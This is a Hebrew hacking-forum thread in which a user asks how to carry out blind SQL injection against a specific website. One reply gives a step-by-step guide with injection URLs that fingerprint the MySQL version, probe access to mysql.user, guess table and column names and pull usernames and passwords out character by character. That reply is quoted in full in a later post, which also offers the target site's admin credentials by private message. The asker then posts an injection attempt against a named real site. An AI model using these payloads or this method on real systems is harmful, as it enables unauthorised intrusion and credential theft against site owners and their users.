קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. איך אני מבצע את הקודים בפלאפון של ניק
    על ידי לא רשום בפורום בעיות בהרשמה/התחברות
    תגובות: 1
    הודעה אחרונה: 01-09-2009, 16:25
  2. תגובות: 4
    הודעה אחרונה: 19-08-2009, 17:04
  3. [שאלה]איך אני מבצע oc ??
    על ידי amricanpitbull בפורום חומרה ומודינג
    תגובות: 3
    הודעה אחרונה: 07-04-2009, 16:08
  4. מישהו יכול להגיד לי איך אני יכול להעלות קבצים לאתר?
    על ידי aviv301 בפורום מזרחית ודיכאון להורדה
    תגובות: 0
    הודעה אחרונה: 27-12-2005, 16:48
  5. [שאלה]איך אני משיג דומיין ושרת לאתר שלי?
    על ידי Fabio בפורום תמיכה טכנית
    תגובות: 6
    הודעה אחרונה: 01-12-2005, 23:16
+ תגובה לנושא
עמוד 1 מתוך 2 12 אחרון >>
מציג תוצאות 1 עד 15 מתוך 28

איך אני מבצע הזרקה עיוורת לאתר כמו זה?

  1. #1
    משתמש משקיע האוואטר של Reggae-Man
    תאריך הצטרפות
    03/2010
    הודעות
    2,811
    לייקים
    11
    נקודות
    1
    מין: זכר

    ברירת מחדל איך אני מבצע הזרקה עיוורת לאתר כמו זה?


  2. קישורים ממומנים

  3. #2
    תומך טכני
    תאריך הצטרפות
    07/2008
    גיל
    32
    הודעות
    5,645
    לייקים
    72
    נקודות
    911
    מין: זכר

    ברירת מחדל

    לא הצעת מועמדות לניהול הפורום?

  4. #3
    משתמש משקיע האוואטר של Reggae-Man
    תאריך הצטרפות
    03/2010
    הודעות
    2,811
    לייקים
    11
    נקודות
    1
    מין: זכר

    ברירת מחדל

    קיצר תגידו מה משעמם לכם אשכרה בחיים כל הזמן לעקוץ יש לי ידע רחב אבל ב SQL ידע סביר ובשאר יש לי ידע גדול פריצות סטימים וכל מיני דברים עוד קיצר יש לי הרבה לתרום חוץ מ SQL זה לא הכול בחיים ובמקום כל החיים לעקוץ תעזרו קצת

  5. #4
    תומך טכני
    תאריך הצטרפות
    07/2008
    גיל
    32
    הודעות
    5,645
    לייקים
    72
    נקודות
    911
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי Reggae-Man צפיה בהודעה
    קיצר תגידו מה משעמם לכם אשכרה בחיים כל הזמן לעקוץ יש לי ידע רחב אבל ב SQL ידע סביר ובשאר יש לי ידע גדול פריצות סטימים וכל מיני דברים עוד קיצר יש לי הרבה לתרום חוץ מ SQL זה לא הכול בחיים ובמקום כל החיים לעקוץ תעזרו קצת
    מצטער על זה אבל מה אני אגיד לך
    זאת הייתה הדרך היחידה שיכלתי להגיד לך מה דעתי על כול הרעיון הזה

  6. #5
    משתמש משקיע האוואטר של Reggae-Man
    תאריך הצטרפות
    03/2010
    הודעות
    2,811
    לייקים
    11
    נקודות
    1
    מין: זכר

    ברירת מחדל

    שמע זכותי להיות מנהל ויש לי ידע בנושאים אחרים לא דווקא הזרקות ותכנות מקורות מידע ידע בפריצת משתמשים וכל מיני ואשמח עם אתה כזה חכם שתעזור לי פה

  7. #6
    מורחקים
    שם פרטי
    דור
    תאריך הצטרפות
    07/2010
    גיל
    29
    הודעות
    762
    לייקים
    0
    נקודות
    114
    משפט מחץ
    Hacking is My Job
    מין: זכר

    ברירת מחדל

    שלום,הנה מדריך קטן:

    בשביל לבדוק אם אפשר לעשות הזרקה עיוורת, מה שנעשה זה נכניס לשורת הכתובת נתון לא נכון, ונראה אם חלק מהאתר נעלם (טקסט, תמונות וכו').
    לדוגמא, לאתר בכתובת הזו -
    http://www.domain.com/?id=2
    נכניס את הכתובת הזו -
    http://www.domain.com/?id=2 and 1=2
    כשברור שהחלק השני הוא שקר – לכן השאילתה לא אמורה להתבצע, וחלק מהאתר צריך להעלם. אם חלק מהאתר נעלם, סימן שאפשר
    לעשות הזרקה עיוורת על האתר.

    1. גרסאת MySQL :

    נברר מה גרסאת הSQL בצורה עיוורת – נכניס שאילתה ששואלת אם זה MySQL 4. אם שום חלק לא נעלם, זה נכון. אם לא, נחליף את השאילתה באחת ששואלת אם זה MySQL 5 – ואז נדע איזה מהגרסאות מותקנת על השרת.
    שאילתות לבירור אם הגרסא היא 4 ו5 -
    http://www.domain.com/?id=2 and substring(@@version,1,1)=4
    http://www.domain.com/?id=2 and substring(@@version,1,1)=5
    2. אחרי שאנחנו יודעים את הגרסא, נמשיך עם
    http://www.domain.com/?id=2 and (select 1)=1
    העמוד צריך להיטען כמו שצריך.
    עכשיו צריך לבדוק אם יש לנו גישה לMySQL.user
    http://www.domain.com/?id=2 and (select 1 from mysql.user limit 0,1)=1
    אם יש לנו גישה זה אומר שאנחנו נוכל לשלוף סיסמאות אח"כ בעזרת הפונקציות ()loadfile וOUTFILE.
    3. לגלות את שם הטבלאות והטורים
    עכשיו צריך לנחש.
    http://www.domain.com/?id=2 and (select 1 from users limit 0,1)=1
    אם הדף נטען בלי שחסר תוכן (כמו שצריך), אז זה אומר שהטבלה users קיימת. אם לא, צריך לנחש שוב…
    http://www.domain.com/?id=2 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
    אם הדף נטען כמו שצריך, זה אומר שהטור password קיים. אם לא, צריך לנחש שוב…
    ועכשיו לחלק הקשה והמעצבן, אנחנו הולכים לעבור אות אות על השם משתמש והססמא ולנסות לנחש את הערך האסקי שלהם, על ידי שימוש בשורה:
    http://www.domain.com/?id=2 and ascii(substring((select concat(username,0x3a,password) from users limit 0,1),1,1))>80
    השורה הזו תשלוף את האות הראשונה של המשתמש הראשון בטבלת המשתמשים. הפונקציה אסקי תהפוך את זה לאות, ואז תושווה האות ל80 – אם ערך האסקי שלה גדול או קטן מ80. אם זה נכון, והערך גדול מ-80, הדף ייטען כמו שצריך. אם לא, משהו יהיה בו חסר. אז נמשיך ונגדיל את 80 עד שנגיע לדף חסר. נברר איזה תו הוא בטבלת הascii, ונעבור לאות הבאה על ידי שינוי "1" המודגש בשורה. כך עד שנגיע לאות שיותר קטנה מ-0, ולכן כל מה שנכניס אליה יהיה FALSE ויציג דף חסר – וזה יסמל את הסוף.
    ישנם כמה כלים להזרקות עיוורות. sqlmap ככל הנראה הכי מומלץ, למרות שאני מעדיף לעשות הכל באופן ידני.
    נערך לאחרונה על ידי H4a6c19k5e18R; 18-08-2010 בשעה 20:10.

  8. #7
    תומך טכני
    תאריך הצטרפות
    07/2008
    גיל
    32
    הודעות
    5,645
    לייקים
    72
    נקודות
    911
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי Reggae-Man צפיה בהודעה
    שמע זכותי להיות מנהל ויש לי ידע בנושאים אחרים לא דווקא הזרקות ותכנות מקורות מידע ידע בפריצת משתמשים וכל מיני ואשמח עם אתה כזה חכם שתעזור לי פה
    נתחיל מיזה שמקורות מידע זה לא ממש אבטחת מידע אותו דבר לגבי סטימים והדברים האחרים שזרקת פה
    ואם כבר דיברת על מקורות מידע יכלת לחפש מדריך/ים בנושא דבר שלא ניראלי צריך להיות מנכל גוגל כדי לעשות אותו...

  9. #8
    מורחקים
    שם פרטי
    ***
    תאריך הצטרפות
    08/2010
    גיל
    31
    הודעות
    68
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי dorrok4 צפיה בהודעה
    שלום,הנה מדריך קטן:

    בשביל לבדוק אם אפשר לעשות הזרקה עיוורת, מה שנעשה זה נכניס לשורת הכתובת נתון לא נכון, ונראה אם חלק מהאתר נעלם (טקסט, תמונות וכו').
    לדוגמא, לאתר בכתובת הזו -
    http://www.domain.com/?id=2
    נכניס את הכתובת הזו -
    http://www.domain.com/?id=2 and 1=2
    כשברור שהחלק השני הוא שקר – לכן השאילתה לא אמורה להתבצע, וחלק מהאתר צריך להעלם. אם חלק מהאתר נעלם, סימן שאפשר
    לעשות הזרקה עיוורת על האתר.

    1. גרסאת MySQL :

    נברר מה גרסאת הSQL בצורה עיוורת – נכניס שאילתה ששואלת אם זה MySQL 4. אם שום חלק לא נעלם, זה נכון. אם לא, נחליף את השאילתה באחת ששואלת אם זה MySQL 5 – ואז נדע איזה מהגרסאות מותקנת על השרת.
    שאילתות לבירור אם הגרסא היא 4 ו5 -
    http://www.domain.com/?id=2 and substring(@@version,1,1)=4
    http://www.domain.com/?id=2 and substring(@@version,1,1)=5
    2. אחרי שאנחנו יודעים את הגרסא, נמשיך עם
    http://www.domain.com/?id=2 and (select 1)=1
    העמוד צריך להיטען כמו שצריך.
    עכשיו צריך לבדוק אם יש לנו גישה לMySQL.user
    http://www.domain.com/?id=2 and (select 1 from mysql.user limit 0,1)=1
    אם יש לנו גישה זה אומר שאנחנו נוכל לשלוף סיסמאות אח"כ בעזרת הפונקציות ()loadfile וOUTFILE.
    3. לגלות את שם הטבלאות והטורים
    עכשיו צריך לנחש.
    http://www.domain.com/?id=2 and (select 1 from users limit 0,1)=1
    אם הדף נטען בלי שחסר תוכן (כמו שצריך), אז זה אומר שהטבלה users קיימת. אם לא, צריך לנחש שוב…
    http://www.domain.com/?id=2 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
    אם הדף נטען כמו שצריך, זה אומר שהטור password קיים. אם לא, צריך לנחש שוב…
    ועכשיו לחלק הקשה והמעצבן, אנחנו הולכים לעבור אות אות על השם משתמש והססמא ולנסות לנחש את הערך האסקי שלהם, על ידי שימוש בשורה:
    http://www.domain.com/?id=2 and ascii(substring((select concat(username,0x3a,password) from users limit 0,1),1,1))>80
    השורה הזו תשלוף את האות הראשונה של המשתמש הראשון בטבלת המשתמשים. הפונקציה אסקי תהפוך את זה לאות, ואז תושווה האות ל80 – אם ערך האסקי שלה גדול או קטן מ80. אם זה נכון, והערך גדול מ-80, הדף ייטען כמו שצריך. אם לא, משהו יהיה בו חסר. אז נמשיך ונגדיל את 80 עד שנגיע לדף חסר. נברר איזה תו הוא בטבלת הascii, ונעבור לאות הבאה על ידי שינוי "1" המודגש בשורה. כך עד שנגיע לאות שיותר קטנה מ-0, ולכן כל מה שנכניס אליה יהיה FALSE ויציג דף חסר – וזה יסמל את הסוף.
    ישנם כמה כלים להזרקות עיוורות. sqlmap ככל הנראה הכי מומלץ, למרות שאני מעדיף לעשות הכל באופן ידני.
    לא חייב לנחש ממש לא, בכל מקרה האתר הזה מאוד צפוי והיה קל להוציא הכל, מי שרוצה לדעת את הפרטים על המשתמש של האדמין שישלח ה"פ וזכרו כל הנעשה ללא אחריותי ובאחריות המבצע בלבד.

  10. #9
    משתמש משקיע האוואטר של Reggae-Man
    תאריך הצטרפות
    03/2010
    הודעות
    2,811
    לייקים
    11
    נקודות
    1
    מין: זכר

    ברירת מחדל

    וואי וואי אשכרה סרט לעשות את זה

  11. #10
    משתמש משקיע האוואטר של Reggae-Man
    תאריך הצטרפות
    03/2010
    הודעות
    2,811
    לייקים
    11
    נקודות
    1
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי Wrongdoer צפיה בהודעה
    לא חייב לנחש ממש לא, בכל מקרה האתר הזה מאוד צפוי והיה קל להוציא הכל, מי שרוצה לדעת את הפרטים על המשתמש של האדמין שישלח ה"פ וזכרו כל הנעשה ללא אחריותי ובאחריות המבצע בלבד.
    אז יש מצב איך אתה מסביר לי לעשות את זה בלי לנחש אות אות?

  12. #11
    מורחקים
    שם פרטי
    ***
    תאריך הצטרפות
    08/2010
    גיל
    31
    הודעות
    68
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל

    כל השיטת הזרקה שהוא הביא לך לדעתי לא טובה, אני למדתי ממדריך שכבר לא קיים ברשת אבל מצאתי מדריך אחר של רועי מהפורום פה הוא מצויין, הנה :
    http://www.iatraf.co.il/showthread.php?t=637208

  13. #12
    משתמש משקיע האוואטר של Reggae-Man
    תאריך הצטרפות
    03/2010
    הודעות
    2,811
    לייקים
    11
    נקודות
    1
    מין: זכר

    ברירת מחדל

    לא יודע המדריך שלו ממש אבל ממש לא עזר לי לדוגמא

    http://idecide.co.il/index2.php?id=2...2,3+from+users

    רואים דף לבן כמשהו נכון

  14. #13
    משתמש משקיע האוואטר של Reggae-Man
    תאריך הצטרפות
    03/2010
    הודעות
    2,811
    לייקים
    11
    נקודות
    1
    מין: זכר

    ברירת מחדל

    הקפצה בבקשה תעזרו לי

  15. #14
    מורחקים
    תאריך הצטרפות
    05/2007
    הודעות
    454
    לייקים
    3
    נקודות
    35

    ברירת מחדל

    בטח לא עזר כי הוא סתם העתיק
    לא חסר מדריכים באינטרנט... יש אפילו תוכנות כמו שאתה עושה תמיד לומד מתוכנות ואז לבד אז תעשה את זה

  16. #15
    משתמש משקיע האוואטר של Reggae-Man
    תאריך הצטרפות
    03/2010
    הודעות
    2,811
    לייקים
    11
    נקודות
    1
    מין: זכר

    ברירת מחדל

    מה סתם העתיק עשיתי כמו שכתוב במדריך ושיניתי תדברים לפי סוג האתר במקום לזלזל תעזור ותראה קודם כל מה שניסיתי לעשות לפני שתגיד העתקה

+ תגובה לנושא
עמוד 1 מתוך 2 12 אחרון >>


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 21:38.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,473,544 | הודעות: 8,174,131 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect